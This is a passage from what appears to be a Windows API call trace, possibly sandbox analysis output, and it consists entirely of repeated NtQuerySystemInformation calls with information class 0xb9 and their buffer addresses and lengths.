(SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0226.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.688] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf20, Length=0x20, ResultLength=0x0) [0226.691] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcea0, Length=0x20, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0226.692] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.693] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.695] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf90, Length=0x28, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.697] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd000, Length=0x28, ResultLength=0x0) [0226.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.698] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.700] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd080, Length=0x28, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x20, ResultLength=0x0) [0226.701] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd160, Length=0x38, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfe0, Length=0x20, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf70, Length=0x20, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.702] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd240, Length=0x58, ResultLength=0x0) [0226.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.703] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0226.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.705] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.707] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf60, Length=0x28, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfd0, Length=0x28, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0226.708] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.709] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0226.710] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd050, Length=0x28, ResultLength=0x0) [0226.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.711] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0226.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0226.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.712] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcec0, Length=0x20, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fce40, Length=0x20, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd090, Length=0x20, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf30, Length=0x20, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.714] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd120, Length=0x38, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcfb0, Length=0x20, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf40, Length=0x20, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fcf40, Length=0x20, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd4a8, Length=0x50, ResultLength=0x0) [0226.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd200, Length=0x28, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.718] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd270, Length=0x28, ResultLength=0x0) [0226.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0226.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.719] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x28, ResultLength=0x0) [0226.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.721] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd2f0, Length=0x28, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1d0, Length=0x20, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.722] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd3d0, Length=0x38, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd250, Length=0x20, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd1e0, Length=0x20, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.723] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd350, Length=0x50, ResultLength=0x0) [0226.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.724] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd280, Length=0x38, ResultLength=0x0) [0226.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, ResultLength=0x0) [0226.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0226.726] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc7520fd0b0, Length=0x28, 